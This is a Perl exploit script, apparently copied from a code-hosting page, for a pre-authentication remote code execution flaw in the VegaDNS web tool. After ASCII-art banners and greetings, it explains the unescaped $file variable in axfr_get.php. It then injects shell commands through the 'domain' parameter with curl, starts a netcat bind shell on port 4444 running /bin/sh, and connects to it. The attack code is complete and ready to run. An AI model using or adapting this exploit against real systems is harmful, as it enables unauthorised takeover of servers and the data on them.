234 lines
No EOL
21 KiB
Perl
Executable file
234 lines
No EOL
21 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
$izd= qq{
|
|
██╗███████╗██╗ ██╗███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗
|
|
██║╚══███╔╝██║ ██║████╗ ██║██╔══██╗ ██╔══██╗██╔══██╗██╔═══██╗██╔══██╗
|
|
██║ ███╔╝ ██║ ██║██╔██╗ ██║███████║ ██║ ██║██████╔╝██║ ██║██████╔╝
|
|
██║ ███╔╝ ██║ ██║██║╚██╗██║██╔══██║ ██║ ██║██╔══██╗██║ ██║██╔═══╝
|
|
██║███████╗╚██████╔╝██║ ╚████║██║ ██║ ██████╔╝██║ ██║╚██████╔╝██║
|
|
╚═╝╚══════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝
|
|
};$vg=qq{
|
|
▀ ▐░░▄ ▄▄▄▄▄▄▄
|
|
▀▀ ▄░ ▐▀▄▀▄ ▄▄▓▓▓▒▒▒▒▒▒▓▓▄
|
|
▀▀▀ ▐▄▄░ ▀▐▄ ▄▀▄ ▄ ▄▄▀▀▀ ▀▀▓▓▓▓▒▒░▒▓▓▌
|
|
▀ ▄ ▐▀▄ ▀▄░ ▄▄░░ ▀▓▓▓▓▓▓▓▓▓▌
|
|
▐▀▄▀▄ ▀▀▄▀▄ ▓▌░░ ▄▄▐▓▀▓▓░▀▓▓▓▌
|
|
▀▄▀▄▀▄░ ▐▀▄▀▄ ▐▓▒▄▄ ░▓▀ ▐▀▄▀▒▄▄▒▀▓▓▓▄ ▄▄▄▓▓▓▓▄▄▄
|
|
▀ ▀▄▀▌▄░ ▀▄▒▄ ▐▀▓▓ ░░ ▒░░ ▀▀▒▒▒▓▓▒░░░ ░░▒▒▄
|
|
▀ ▀ ▐▌ ░█░ ▒▌▐▀▄░▄ ▒░▒░░ ░░▒░ ░░▓
|
|
▐▄ ░░░ ░▒░░▒▌ █▄▒░▄ ▄▓▒░ ▐░░ ░░░▒░ ░░
|
|
▓▓░▄▓ ░▒░ ░░▐▓ ██▓▓▓▓▓░▄▄ ▐░░░▒▄▒░░░ ░ ░░░░
|
|
▀█▓▒▓▓ ░░░░ ░█▒▓▒▒▒▒███▒█▒▒░▒░▐▓▒░░░░░░░ ░ ░░▒▒▒░▒
|
|
█░░ ░▒▒░░█▒▒░░░░░ ░░░░░▐▓▒░░░ ░░░ ░░░▒▒▒█░ ░▒▒
|
|
▐▒▒▒ █▒▓▌░░░ ░░░▒▒▒░░░░▒▓▓▒██▀▀░░ ░░ ░ ░░▒░░░ ░▒
|
|
▓▒░░▐▒░ ░▓ ██▌░░░▄▒▒░░▒▒▒░▒▒▓▓░░ ░░░░▒▄░░▒░░ ░▒
|
|
▓▒ ░▒▒▒█ ░▒▓ ▐▒▓░▒▒░ ▐░░ ▀▒▒▒░░░ ░ ▐░░▒▒▒ ░ ░
|
|
█░▀▒▒▓▓▓▒▒░░▓ ▄▒░ ▀▒░░░░ ░ ░░░░░ ░░▒▒▒ ░ ▒▒
|
|
▀▓▓▀░▓▌▒░▒ ░▒▓▓▓▒▒▒░░░░ ░ ░░▒▒░ ░ ░░▒
|
|
▀▀▓▓▌▀░ ░ ░▐▓▓▓▒▓▓▓▄░░░▄ ▐░░░▒▒▒▀ ▐░▒▄░ ▐░░░▒
|
|
▐▒▒░░▄▓▓░▌ ░▒▒▓▓▓▓▒░░░ ░▒░▒▓▒▒░▒░░░░░▒░ ░░▒▒▒▓
|
|
▀▓▓▀▒▄░░░░░ ░▒▒▓▓▌▀▀▓▓▄▓▒▓░░▒▒░░░▒▓▒▓▓▀▀▀▀▀▀▀▀▀▓▓▄
|
|
▓▒░░░▄ ░░▒▓▀ ▀▓▓▓▒▒▓▓▓▓▀░░▒▒▒▀▓▓▓▓▀▀▀▀▓▓
|
|
▀▓▄▒▒▒░░░▒▓ ▐▓▓▓▓▓▒▒▒▓▓▀▒▒▒▀▀░░░░░▒▒▒▓▓▓▄
|
|
▀▀▀▀ ▀ ▐▓▓▓▀▀▀▀░░░░▒░░▒▒▒▓▓▓▓▒▀▀▀▓▓▌
|
|
▄▓▓▓▓▀▀▓▓▓▓▓▓██▀▀▀░░░░░ ▒
|
|
▓▒▒▓▌░░░░░░░▒▌░░░░ ░ ░ ▀ ░▄
|
|
▓▓▓▓▒▌▄░▒▒▒▒▓▒░░░░▀ ░░░ ░░░▒▌
|
|
▄▓▀▀░░░▒▒▄▒▒▓▓░░▄▒░░░▄▄▄▄ ░░░░░▐░
|
|
▄▐█▒ ▒░▒▒▒▒░░▓▓▓▒▓▓▓▒▒▒▀░░▀ ▀ ░░▒▌
|
|
▄▓▒▒░░░░░░▒▒▒▒▒░▒▓▓▓▓▓▓▓▒▒░ ░ ░ ▒▒█▀
|
|
▐▓▒░░░░░░░▒▒▒▒▒▒░▒▓▓▓▓▓▓▓▓▒▌ ░ ▐░ ░ ░▒
|
|
▐▒░░░░░░▒▒▒▒▒▒░░▓▓▓▓▓▓▓▓▓▓▓▒▌░ ░ ▐░░░ ░█
|
|
▒█░░░░░░▒▒▒▒░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒▌ ░ ▐░░░ ░░▒
|
|
▐▓▒░▒░░░░░▒▒▒░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ▒▒░░ ░░░░ ░░▒
|
|
▄▓▒▒▒░░░░░░░░░░░▓░▓▓▒▓▓▓▓█▀▒▓▓▓▓▓▓▓▓▒░ ░░░░ ░░
|
|
▄▒░░░░ ░░░░▒▒▓▓▓▓██▌▐▓▓▓░░▓▓▌░▓▓▓▓▒░ ░ ░░░░ ░░▒
|
|
▒░░░░░░▒▒▓▓▓▓▓▓▓█ ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░ ░ ░░░░ ▐▒▌
|
|
▒▀░░░▒░░▓▒▓▓▓▓▓▌▀ ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░ ░ ░░░░ ░▒▌
|
|
▓ ░▒░░░▀▀▒▓▓▓▓▓▌ ▐▓▓▓ ░░░░░░▓▓▓▓▒░ ░ ░ ░ ░▒▒▌
|
|
▓▓▒░▒░░▒▒▒▓▓▓▓▓▓▌ ▀▓▓▓▓▓▓▓▓▒░ ░░░ ░▄░▒▓▌
|
|
░ ▀▒▓▓▓▓▓▓▓▓▓▌▀▀ ▒░ ░ ░░▓▓▄
|
|
░ ▓ ▓▒░ ░░▒▀▒░▒▄
|
|
▄ ░ ▀ ▓▒░░▄░░░░░▀░░░▌░░▒
|
|
░ ▄▄▀ ▀▒▒▒▒▒▄ ▄░░░░ ▀▀
|
|
░░░ ▓▓▓▒▒▓▄░░ ░ ▐░▄ ░
|
|
░ ░▀░░ ▀▀▒▒▒▒▀ ▀▒ ▄
|
|
▄▄▄▄▄▄ ▄▀▒▓▌▄ ▀▄ ░ ░
|
|
▓▓▓▓▌▄ ▄▓▓▓▓▓▓▓ ▒ ▄ ░ ▄
|
|
▓▒▒▓▓▓▓▓▓▓▓▒▓▓▓▓▓ ░ ▀▓ ▄
|
|
▓▒▒▓▓▓▓▓▓▒▓▓▓▓▓▀ ░ ▀▄░▒▌▄▄
|
|
▄▄▄▓▓▓▓▓▓▓▓▓▓▓███▀ ▄▓▄▄▄▄▄▒▓▓▓▓▄
|
|
▄▓▓▓▓▓▓▓▓▓▒▓▓▓▓▓█ ▐▓████▓▓▓▓▓▓▒▓▓
|
|
▓▓▓▓▄▄▄▄▓▓▓▓▓▓▓█ ▐▓░░░▒▓▓▓▓▒▓▓
|
|
▐▓▓░▒▓▓▓▓▓▓▓
|
|
▐▓▓▓▓▓▓▒▒▓▌
|
|
▓▓▓▓█▒▒▒▒▒▒▒▓▓▌
|
|
██▒░░░░░░░▓▓███
|
|
|
|
};$b=qq{
|
|
██╗ ██╗███████╗ ██████╗ █████╗ ██████╗ ███╗ ██╗███████╗
|
|
██║ ██║██╔════╝██╔════╝ ██╔══██╗██╔══██╗████╗ ██║██╔════╝
|
|
██║ ██║█████╗ ██║ ███╗███████║██║ ██║██╔██╗ ██║███████╗
|
|
╚██╗ ██╔╝██╔══╝ ██║ ██║██╔══██║██║ ██║██║╚██╗██║╚════██║
|
|
╚████╔╝ ███████╗╚██████╔╝██║ ██║██████╔╝██║ ╚████║███████║
|
|
╚═══╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═══╝╚══════╝
|
|
|
|
|
|
██████╗ ███████╗███╗ ███╗ ██████╗ ████████╗███████╗
|
|
██╔══██╗██╔════╝████╗ ████║██╔═══██╗╚══██╔══╝██╔════╝
|
|
██████╔╝█████╗ ██╔████╔██║██║ ██║ ██║ █████╗
|
|
██╔══██╗██╔══╝ ██║╚██╔╝██║██║ ██║ ██║ ██╔══╝
|
|
██║ ██║███████╗██║ ╚═╝ ██║╚██████╔╝ ██║ ███████╗
|
|
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝
|
|
|
|
|
|
███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗ ██████╗ ██╗ ██╗
|
|
██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝ ██╔══██╗╚██╗ ██╔╝
|
|
█████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ ██████╔╝ ╚████╔╝
|
|
██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ ██╔══██╗ ╚██╔╝
|
|
███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ ██████╔╝ ██║
|
|
╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝
|
|
|
|
|
|
▄
|
|
▄█▀ ▀█▄▄
|
|
▄▄▓▀▀ ▀▓▄▄
|
|
▄▓▓▀ ▀█▓▄
|
|
▄▓▓▀ ▀▓▓▓▄
|
|
▄▓▓█▀ ▀▓▓▄▄
|
|
▄▓▓▓▀ ▀▓▓▓▄
|
|
▄▓▓▓▀ ▀▓▓▓▓
|
|
▓▓▓▓▀ ▀▓▓▓▓▄
|
|
▓▓▓▓█ ▀▓▓▓▓
|
|
▐▓▓▓▀ ▓▓▓▌
|
|
▓▓▓▌ ▐▓▓▓
|
|
▓▓▓▌ ▄▓▓▓
|
|
▓▓▓▓ ▄▓▓▓
|
|
▓▓▓▓▓▓▓▓▓▓██ ██▓▓▓▓▓▓▓▓▓▓
|
|
▀▀▀▀ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▀▀█
|
|
▄▄▓▓▓▓▓▓▓▓▓▓▓████▓▓▓▓▓▀ ▓▓▓▓▓████▓▓▓▓▓▓▓▓▓▓▓▄▄
|
|
▄▓▓▓▓█▀▀▀ ▓▓█ ▐▓▓ ▀▀▀█▓▓▓▓▓
|
|
▓▓▓ ▐▓█ ▀▓▌ ▓▓▓
|
|
█▓▌ ▓▀ ▌ ▀▓ ▐▓▓
|
|
▀▓ ▄ ▄▀ ▐ ▌ ▓▓ ▐▄ █ ▀▓▄ ▄▌ ▓▀
|
|
█ ▀▓▄ ▄▓█ ▄▓ ▐▓▓▌ █▓ ▀▓▄▄ ▄▓▀ ▓
|
|
▄▌ █▓▓▓▓▓▀ ▓▓▓▄▓▌▐▓▄▄▓▓ ▀▓▓▓▄▓▓▀ ▐▄
|
|
▓▓ █▀▀ ▀█▀ ▀▓
|
|
▓▓ ▄ ▄▀ ▄ ▄ ▓▓
|
|
▓▓▓▄ ▄▓▀ ▄█ ▄ ▄ ▀▄ ▀▓▄ ▓▓▓
|
|
████▀▀▀▀▀▀▀▀▀ ▓▀ ▄ ▄ ▓ █ ▓ ▀▀▀▀▀▀▀▀▀████
|
|
▄▓▀ ▓ ▄▌▐ ▐ ▌ ▌▐▓ ▓ ▓▄
|
|
▄▓ ▄▄▓▌▐▓ ▐ ▓ ▓ ▓ ▐▄ ▌ ▓▌▐▓▄▄ ▓▓
|
|
▓▓▓█▀▀ ▀█▓▓▌ ▓ ▐▓ █▌ ▓ ▓▓█▀ ▀▀█▓▓▓
|
|
█▀ ▀ ▐▓▄▓▌ ▐▓▄▓▌ ▀ ▀█
|
|
▀ ▀▀
|
|
|
|
|
|
___ .___ .______ ._______._____ .___.__ ._______ .____ .___
|
|
.___ | |: __|: __ \ : .____/:_ ___\ : | \ : .___ \ | |___ | |
|
|
: | /\| || : || \____|| : _/\ | |___| : || : | || | || |
|
|
| |/ : || || : \ | / \| / || . || : || : || |/\
|
|
| / || || |___\|_.: __/|. __ ||___| | \_. ___/ | || / \
|
|
|______/|___||___||___| :/ :/ |. | |___| :/ |. _____/ |______/
|
|
: : :/ : :/
|
|
: : :
|
|
|
|
};$g=qq{
|
|
|
|
██████╗ ██████╗ ███████╗███████╗████████╗███████╗
|
|
██╔════╝ ██╔══██╗██╔════╝██╔════╝╚══██╔══╝╚══███╔╝
|
|
██║ ███╗██████╔╝█████╗ █████╗ ██║ ███╔╝
|
|
██║ ██║██╔══██╗██╔══╝ ██╔══╝ ██║ ███╔╝
|
|
╚██████╔╝██║ ██║███████╗███████╗ ██║ ███████╗
|
|
╚═════╝ ╚═╝ ╚═╝╚══════╝╚══════╝ ╚═╝ ╚══════╝
|
|
|
|
To all the people with mad skills who share their knowledge:
|
|
|
|
TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO,
|
|
mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan,
|
|
lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil,
|
|
laughing_mantis, g0tm1k, nmrc, and many many more....
|
|
|
|
};$a=qq^
|
|
|
|
█████╗ ███╗ ██╗ █████╗ ██╗ ██╗ ██╗███████╗██╗███████╗
|
|
██╔══██╗████╗ ██║██╔══██╗██║ ╚██╗ ██╔╝██╔════╝██║██╔════╝
|
|
███████║██╔██╗ ██║███████║██║ ╚████╔╝ ███████╗██║███████╗
|
|
██╔══██║██║╚██╗██║██╔══██║██║ ╚██╔╝ ╚════██║██║╚════██║
|
|
██║ ██║██║ ╚████║██║ ██║███████╗██║ ███████║██║███████║
|
|
╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚══════╝╚═╝ ╚══════╝╚═╝╚══════╝l
|
|
|
|
VegaDNS is a tinydns administration tool written in PHP to allow easy
|
|
administration of DNS records through a web browser.
|
|
-- http://www.vegadns.org
|
|
|
|
|
|
The file axfr_get.php allows unauthenticated access and fails to correctly
|
|
apply input escaping to all variables that is based on user input. This
|
|
allows an attacker to inject shell syntax constructs to take control of the
|
|
command execution.
|
|
|
|
The following code from axfr_get.php shows how the variable $file becomes
|
|
tainted trough the $domain variable which is tainted from direct user input.
|
|
The application tries to prevent this by escaping the $domain and $hostname
|
|
variables, but fails to escape the $file variable.
|
|
|
|
---------------------------cut---------------------------
|
|
* NOTE:
|
|
* This functionality ONLY exists outside of the main application
|
|
* because tcplient kept dying fatally due to file descriptor 7
|
|
* being unavailable, which only occurs AFTER session_start() is
|
|
* called.
|
|
*
|
|
*/
|
|
require_once 'src/config.php';
|
|
// CHECKS
|
|
// Make sure the hostname was given
|
|
if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") {
|
|
echo "ERROR: no hostname given\n";
|
|
exit;
|
|
}
|
|
// Make sure that some domains were given
|
|
if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") {
|
|
echo "ERROR: no domain was supplied\n";
|
|
exit;
|
|
}
|
|
$domain = $_REQUEST['domain'];
|
|
$hostname = $_REQUEST['hostname'];
|
|
$rand = rand();
|
|
$file = "/tmp/$domain.$rand";
|
|
$command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1";
|
|
exec($command, $out);
|
|
---------------------------end---------------------------
|
|
|
|
███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗
|
|
██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
|
|
█████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║
|
|
██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║
|
|
███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║
|
|
╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝
|
|
^;
|
|
|
|
print "$izd\n"." " x 17 . "VegaDNS pre-auth RCE exploit by \@Wireghoul\n";
|
|
print " "."=" x 50 ."[justanotherhacker.com]==\n";
|
|
&usage if ($ARGV[0] !~ m!.+://([^/:]+)!);
|
|
$h=$1;
|
|
print " . . . Locating netcat\n";
|
|
$cmd='which+nc';
|
|
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
|
|
$z=`curl -s -k '$t'`;
|
|
if ($z !~ m{/nc}) {
|
|
print " ! ! ! netcat not found! Manual exploitation required:\n";
|
|
print " $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b\n";
|
|
exit 1;
|
|
}
|
|
print " . . . netcat found: $z\n";
|
|
print " . . . Performing IZUNA DROP!\n";
|
|
# ← · ↑ · → · ↓ · ↖ · ↗ · ↘ · ↙
|
|
print " ↓ ↓ ↑ *k* → → *p*\n";
|
|
$cmd="$z+-e+/bin/sh+-lp+4444";
|
|
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
|
|
$z=`curl -m 3 -s -k '$t &'`;
|
|
print $vg."\n";
|
|
print " . . . K.O ! ! ! Connecting to bindshell on $h port 4444\n";
|
|
system("nc -v $h 4444");
|
|
sub usage { print "Usage $0 http://host/path/to/vegadns\n\n$ARGV[0]"; exit; |